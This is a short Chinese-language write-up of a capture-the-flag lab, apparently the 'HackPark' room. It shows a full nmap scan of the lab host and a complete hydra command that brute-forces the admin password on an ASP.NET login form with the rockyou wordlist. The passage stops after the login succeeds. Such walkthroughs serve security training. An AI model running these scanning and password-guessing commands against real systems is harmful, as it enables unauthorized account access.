1 扫描
主要就是80进web搜集信息
C:\root> nmap -A 10.10.16.216
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.64 seconds
C:\root> nmap -A 10.10.16.216 -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 01:55 EDT
Nmap scan report for 10.10.16.216
Host is up (0.27s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
80/tcp open tcpwrapped
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open tcpwrapped
|_ssl-date: 2020-05-26T05:56:29+00:00; +1s from scanner time.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
2 hydra
没找到什么价值东西
dirbuster扫到登录框
没有账号信息提示文件,sql注入也难搞。hydra跑跑看看,然后边等结果,边继续搜集其他信息。
keep me logged in那里打勾,然后随便输
burp抓包,再根据burp的抓包数据从而写这个hydra命令。账号就先猜admin
建议参考我的这个命令。
我先前试了很多次都跑不出来,跑出来16个莫名其妙的,我在论坛里看也有很多人是这种情况。
最后这个才ok
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.16.216 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin%2f:__VIEWSTATE=d%2B8KY5CoALVVu3cyx1zQBa5HJIO%2B%2BuZdB%2F%2BI60ddHdGPMLjeczLW8wG6%2F3cxgyyj17FxjLlJy7Twjwl9N1TRQeynyuc%2F5RKomk5MP%2FpeLy5wQ2c%2B7weG4x4uHWQiN%2FQF4LIxVWckJ9JJ917ffDnhcNkWhEBiW8q3eZ19lK2WyzCRq7S2DZkFFNMnsXpVs7at1VNHuoutNFwFg%2BVI37N6HIkOx5Qt328mR7vR7ebWV06at%2FS%2BsdWUqSKUoYuhr9OqGbzaUlh%2FnjLqzUm7SFRA1L5C8PIZwaoyXGbiL7eASUHrj8s6vV%2FeiHbGYe5qsDWUSyQ%2BC2n0ElFVOIz403nfU7lhvpxR3XtPJgq5UHAn%2ByWx57H7&__EVENTVALIDATION=1XEVJ1TGaBbiR0C2cHb0tUPm%2F1h0aH5m0aXu8WckU4cPKPYBmRLiAqA2YXBqXGokg%2FhfrQi0VwT0Hq88Tkye8%2B5IB%2FtOYN5QvJ%2Fcr5XMLS4etWgbMuTiY%2FFYogM1B6Rn9WbdAh%2FRXUPQEDcxHvLHDKyyIS09lavR7XBTiUvPVfzqMMDv&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24RememberMe=on&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed"
进入后,看到版本